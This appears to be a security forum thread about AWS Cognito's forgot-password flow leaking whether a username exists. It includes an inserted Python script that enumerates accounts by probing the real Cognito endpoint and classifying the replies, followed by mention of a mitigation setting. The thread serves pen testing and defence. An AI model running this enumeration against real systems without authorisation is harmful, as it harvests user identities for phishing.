
I am doing a pen test on a client system that uses AWS Cognito and user pools for authentication, via the client-side SDK provided by AWS.

During the forgot-password flow, I noticed that the Cognito request returns 400 with a payload of

__type  UserNotFoundException
message Username/client id combination not found. 

and 200 when a user is found

CodeDeliveryDetails {}
AttributeName   email
DeliveryMedium  EMAIL
Destination j***@g***.com

Is this considered a vulnerability? It seems to be to me. It's kind of an information leak, since anyone can check whether an email has an account with my app by calling this URL.

Another attack vector would be brute forcing against a list of known emails to build a list of users on the app for marketing or phishing purposes.

Ideally, for this flow you would want Cognito to return 200 regardless of whether the email exists or not.

I know that what is considered a vulnerability is never black and white, but this seems to be an issue to me given that AWS is so big and trusted.

jia chen
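The oracle described above can be checked mechanically: Cognito's ForgotPassword call is unauthenticated (a POST to the regional cognito-idp endpoint with X-Amz-Target set to AWSCognitoIdentityProviderService.ForgotPassword), so a tester only needs to send one request per candidate username and compare the shape of the reply. The script below is an added example, not code from the question or from AWS; the client ID, region and candidate addresses are hypothetical, and the fake transport at the bottom is a constructed replay of the two responses quoted in the question so the logic can be exercised offline.

```python
"""Probe Cognito's ForgotPassword API for a username-enumeration oracle.

Added example (not part of the original post). The classification rule is
exactly the difference the question reports: 200 + CodeDeliveryDetails for a
known user, 400 + UserNotFoundException for an unknown one.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

# Cognito exposes ForgotPassword as an unauthenticated JSON call.
TARGET = "AWSCognitoIdentityProviderService.ForgotPassword"
CONTENT_TYPE = "application/x-amz-json-1.1"

# A transport takes (url, body, headers) and returns (status, raw body).
Transport = Callable[[str, bytes, Dict[str, str]], Tuple[int, bytes]]


def cognito_endpoint(region: str) -> str:
    return f"https://cognito-idp.{region}.amazonaws.com/"


def http_transport(url: str, body: bytes, headers: Dict[str, str]) -> Tuple[int, bytes]:
    """Real network transport; 4xx/5xx replies are returned, not raised."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(status: int, body: bytes) -> str:
    """Map one ForgotPassword reply to 'exists', 'absent', 'blocked' or 'unknown'."""
    try:
        payload = json.loads(body.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return "unknown"
    if status == 200 and "CodeDeliveryDetails" in payload:
        return "exists"
    err_type = payload.get("__type", "")
    if err_type == "UserNotFoundException":
        return "absent"
    # Throttling replies mean further verdicts would be noise, not signal.
    if err_type in ("LimitExceededException", "TooManyRequestsException"):
        return "blocked"
    return "unknown"


def probe(client_id: str, username: str, region: str,
          transport: Transport = http_transport) -> str:
    body = json.dumps({"ClientId": client_id, "Username": username}).encode()
    headers = {"Content-Type": CONTENT_TYPE, "X-Amz-Target": TARGET}
    status, raw = transport(cognito_endpoint(region), body, headers)
    return classify(status, raw)


def enumerate_users(client_id: str, candidates: Iterable[str], region: str,
                    transport: Transport = http_transport) -> Dict[str, str]:
    """Probe each candidate; stop as soon as Cognito starts rate limiting."""
    results: Dict[str, str] = {}
    for name in candidates:
        verdict = probe(client_id, name, region, transport)
        results[name] = verdict
        if verdict == "blocked":
            break
    return results


# --- Constructed offline replay of the responses quoted in the question ---
_KNOWN = b'{"CodeDeliveryDetails": {"AttributeName": "email", "DeliveryMedium": "EMAIL", "Destination": "a***@e***.com"}}'
_MISSING = b'{"__type": "UserNotFoundException", "message": "Username/client id combination not found."}'
_THROTTLED = b'{"__type": "LimitExceededException", "message": "Attempt limit exceeded, please try after some time."}'


def fake_transport(url: str, body: bytes, headers: Dict[str, str]) -> Tuple[int, bytes]:
    """Pretend Cognito: one known user, one throttled user, everything else unknown."""
    assert headers["X-Amz-Target"] == TARGET
    username = json.loads(body)["Username"]
    if username == "alice@example.com":      # hypothetical existing account
        return 200, _KNOWN
    if username == "throttled@example.com":  # hypothetical throttled reply
        return 400, _THROTTLED
    return 400, _MISSING


if __name__ == "__main__":
    found = enumerate_users("hypothetical-client-id",
                            ["alice@example.com", "nobody@example.com"],
                            "us-east-1", transport=fake_transport)
    for user, verdict in found.items():
        print(f"{user}: {verdict}")
```

Swap fake_transport for the default http_transport and a real app client ID to run it against a target you are authorised to test; the "blocked" verdict is what the answer below is alluding to when it mentions rate limiting, and a real run should record how many probes it took before that verdict appeared. Cognito app clients later gained a "Prevent user existence errors" setting (PreventUserExistenceErrors on the app client); with it enabled, ForgotPassword returns simulated CodeDeliveryDetails for unknown usernames as well, so both branches of classify() collapse to "exists" and the oracle closes.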

1 Answer


Yes, this is a vulnerability; more than one attack vector depends on the same logic, examples listed below.

  • SMTP VRFY option enabled
  • OpenSSH Username Enumeration
  • SIP INVITE/REGISTER Response User Enumeration

BUT as you mentioned, vulnerability is never black and white. AWS may consider this a risk and may have implemented rate limiting; if so, they reduce the risk significantly.

alnbhclyn
  • +1 Yes, I will try to log an issue with them. Ideally this should be configurable on the AWS dashboard given the scale of Cognito! – jia chen May 31 '19 at 09:40